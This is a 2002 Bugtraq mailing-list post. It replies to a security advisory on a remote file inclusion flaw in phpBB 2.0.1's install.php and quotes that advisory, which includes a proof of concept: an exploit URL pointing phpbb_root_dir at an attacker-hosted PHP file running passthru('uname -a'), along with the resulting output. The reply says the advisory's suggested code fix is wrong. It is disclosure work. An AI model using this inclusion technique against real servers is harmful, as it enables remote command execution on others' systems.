Bugtraq mailing list archives
Re: malicious PHP source injection in phpBB
From: Jonathan Haase <jlhaase () iland net>
Date: Mon, 17 Jun 2002 16:20:21 -0500
Note... The suggested fix for this in the php code below is very incorrect and will in fact leave install.php even more wide open than it currently is... The correct fix to the php code should be to change the line on or about line 28 which reads... include($phpbb_root_dir . 'includes/functions_selects.'.$phpEx); to read more properly include($phpbb_root_path . 'includes/functions_selects.'.$phpEx); Thanks, Jonathan L. Haase On Sunday 16 June 2002 8:29 am, morris Chang wrote:
JCC Security Advisory June 16, 2002 malicious PHP source injection in phpBB Description phpBB is one of popular PHP bulletin board systems. When allow_url_fopen = On and register_globals = On in php.ini, phpBB has vulnerability because install.php contains dangerous codes. So an attacker can include any files into server's PHP codes. Impact It's tested on phpBB 2.0.1. but I think all of phpBB 2 is affected. Workaround allow_url_fopen = off and register_globals = off. and if complete install remove or rename install.php. Or in install.php -------install.php------------ define('IN_PHPBB', true); $phpbb_root_path='./'; ---------------------------- Put it -------snip----------------- $phpbb_root_dir='./'; ---------------------------- Good idea to code that <<PHP_CODE ini_set("register_globals", "Off"); ini_set ("allow_url_fopen", "Off"); PHP_CODE Tested systems phpBB 2.0.1 Debian GNU/Linux SID(x86) Background We checked the vulnerability with "http://URL/install.php?phpbb_root_dir=WANTED_TO_INCLUDE" and made a sample code, functions_selects.php, --------------------includes/functions_selects.php------------ -- <? passthru("uname -a"); ?> ----------------------------------------- and type the following URL to invoke this sample code. TEST URL : http://URL/install.php?phpbb_root_dir=http://MYBOX/" -------out put---------------------------- Linux cpu 2.4.18-686 #1 Sun Apr 14 11:32:47 EST 2002 i686 unknown Warning: Cannot add header information - headers already sent by (output started at http://210.117.152.118:6969/includes/functions_selects.php:1) in /home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 182 Warning: Cannot add header information - headers already sent by (output started at http://210.117.152.118:6969/includes/functions_selects.php:1) in /home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 183 Warning: Cannot add header information - headers already sent by (output started at http://210.117.152.118:6969/includes/functions_selects.php:1) in /home/morris/public_html/tmp/phpBB2/install.php on line 346 ----------------------------------------- thx for BlackKnight at r0ar --- http://jcc.hackerslab.org(at morris Chang) e-mail : morris () xsdeny net
Current thread:
- malicious PHP source injection in phpBB morris Chang (Jun 17)
- RE: malicious PHP source injection in phpBB Nathan Anderson (Jun 18)
- Re: malicious PHP source injection in phpBB Jonathan Haase (Jun 18)